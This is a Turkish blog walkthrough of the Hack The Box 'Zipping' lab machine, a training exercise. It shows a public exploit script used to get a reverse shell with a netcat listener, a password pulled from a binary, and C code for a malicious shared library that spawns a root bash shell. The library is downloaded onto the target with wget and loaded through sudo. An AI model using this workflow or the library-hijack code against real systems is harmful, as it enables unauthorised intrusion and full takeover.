Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. CTF ÇÖZÜMLERİ
  4. »
  5. Hackthebox Zipping Çözümü

Hackthebox Zipping Çözümü

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 3 dk okuma süresi
209 0
Hackthebox zipping çözümü pp

Merhabalar bu yazımda Hackthebox Zipping Çözümü sizler için paylaşacağım. 

1- sudo nano /etc/hosts yazalım ve enter yapalım.

10.10.10.229 zipping.htb olarak ekleyelim ve CTRL +X  Y enter yapıp çıkalım.

Host adresini ip ile direkt olarak yapılandırmış olduk.

2- Nmap ile portları tespit ediyorum. 2 port açık ve buradan da siteyi keşfetmeye devam ediyoruz .

3- Gobuster ile tarama yaptığımda upload.php var. Oradan upload ile denemeler yaptım ve bir şeye ulaşamadım.

Github üzerinden makine için yazılmış scriptlere baktım ve çok iyi scriptler buldum. Direkt kendim upload için script geliştirmek yerine yazılmış scriptleri kullanacağım.

Araştırma yaptığımda /var/lib/mysql/rvsl içerisine shell yükleyerek direkt olarak terminal üzerinden shell alabiliriz ama bunu yapmak için Burpsuite üzerinden çok uğraşmak gerekiyor zamandan kazanmak için python bilginiz varsa bu tarz makinelerde script yazmanızı öneririm.

Kullanacağımız script: https://github.com/saoGITo/HTB_Zipping/blob/main/HTB_Zipping_poc.py

4- ncat nvlp 9001 diyerek 9001. portu dinleyemeye alıyorum.

5- Sırasıyla;

  1. cd Masaüstü
  2. git clone https://github.com/saoGITo/HTB_Zipping/
  3. cd HTB_Zipping
  4. python3 HTB_Zipping_poc.py kendi vpn ip adresiniz 9001

Yazdık ve dosya içerisinde .sh içerisine sizin verdiğiniz bash shelli ekliyor ve uzak sunucudan direkt siteye shelli yüklüyor. Manuel olarak deneseydik aşırı şekilde zaman kaybedecektik.

6- sudo -l yaptım ve /usr/bin/stock üzerinden root olabileceğimizi keşfettim.

Çalıştırdığımda direkt parola istiyor stringlere baktığımda parolayı St0ckM4nager olarak tespit ettim. Devam ediyoruz.

İlginizi çekebilecek yazımız: Hackthebox Beep Çözümü

Hackthebox Zipping Çözümü

7- Kendi makinemize gelip sırayla;

#include <stdlib.h>
#include <unistd.h>

void _init() {
setuid(0);
setgid(0);
system(“/bin/bash -i”);
}

  • nano exploit.c yazdık ve üstteki kodları ekliyoruz. Ctrl +x yapıp Y enter yaparak kaydettik.
  • python3 -m http.server 80

yaparak direkt olarak 80.port üzerinden yazdığımız exploiti makine içerisine yükleyelim.

Hackthebox Zipping Çözümü

8- cd /tmp/ ile dizine geçelim.

  • wget kendivpnadresiniz/exploit.c yaparak exploiti yükledik
  • gcc -shared -fPIC -nostartfiles -o libcounter.so ./exploit.c && mv libcounter.so ~/.config
  • sudo /usr/bin/stock yaparak direkt olarak root oluyoruz.

Hackthebox Zipping Çözümü

9- Root olduk ve sırasıyla bayrakları okuyabiliriz.

  • cat /home/rektsu/user.txt
  • cat /root/root.txt

Hackthebox Zipping çözümü sonuna geldik.

Keyifli bir çözüm oldu iyi günler, sağlıcakla kalın yeni yazılarda görüşmek üzere…

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir